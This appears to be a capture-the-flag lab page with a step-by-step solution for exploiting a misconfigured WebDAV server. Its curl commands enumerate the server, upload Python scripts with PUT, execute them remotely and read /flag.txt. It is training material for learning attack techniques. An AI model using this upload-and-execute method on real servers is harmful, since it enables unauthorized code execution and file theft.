Avatar

Labs / WebDAV Explorer

  • Challenge
  • Released 25 Sep 2025

📁 Can you exploit the WebDAV server to access restricted files?

This corporate file server uses WebDAV for remote file management, but a misconfiguration in the access controls creates a dangerous security flaw. 📂 Many organizations rely on WebDAV for file sharing and collaboration, making it a common target for attackers seeking to upload malicious files or access sensitive data. Master this file server exploitation technique and discover how weak WebDAV configurations can lead to complete system compromise! 🎯

1
Flags
1
Points
Challenge
Solution Available
Pro Exclusive
Start Lab Environment
~1-2 min setup
AWS dedicated
Private instance
Industry standard
Challenge

📁 WebDAV Explorer - Complete Solution

Objective: Exploit WebDAV server misconfigurations to upload Python files and achieve remote code execution to access the system flag.
🔍 Step 1: WebDAV Discovery

Test if the server supports WebDAV by using HTTP OPTIONS method:

curl -X OPTIONS http:/// -v

Look for WebDAV methods in the Allow header: PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, PUT

🔍 Step 2: Directory Enumeration

Use PROPFIND method to enumerate directories and files:

curl -X PROPFIND http:///webdav/

This reveals the WebDAV directory structure with existing files and folders.

🔍 Step 3: File Upload Testing

Test file upload capability using PUT method:

curl -X PUT http:///webdav/test.txt -d "Hello WebDAV"

Successful upload indicates the server accepts file uploads via WebDAV.

🔍 Step 4: Python File Upload

Upload a Python script to test code execution:

curl -X PUT http:///webdav/test.py -d "import os; print('Current directory:', os.getcwd())"
🔍 Step 5: Code Execution Discovery

Access the uploaded Python file to test execution:

curl http:///webdav/test.py

If the server executes Python files, you'll see the script output instead of the source code.

🔍 Step 6: Flag Extraction

Upload a Python script to read the system flag:

curl -X PUT http:///webdav/getflag.py -d "import os; print(open('/flag.txt').read())"
🔍 Step 7: Execute Flag Script

Access the flag extraction script to retrieve the flag:

curl http:///webdav/getflag.py

The server executes the Python code and returns the flag content from /flag.txt.

🛡️ Security Implications

This vulnerability demonstrates how WebDAV servers with code execution capabilities can lead to complete system compromise through file upload and remote code execution attacks.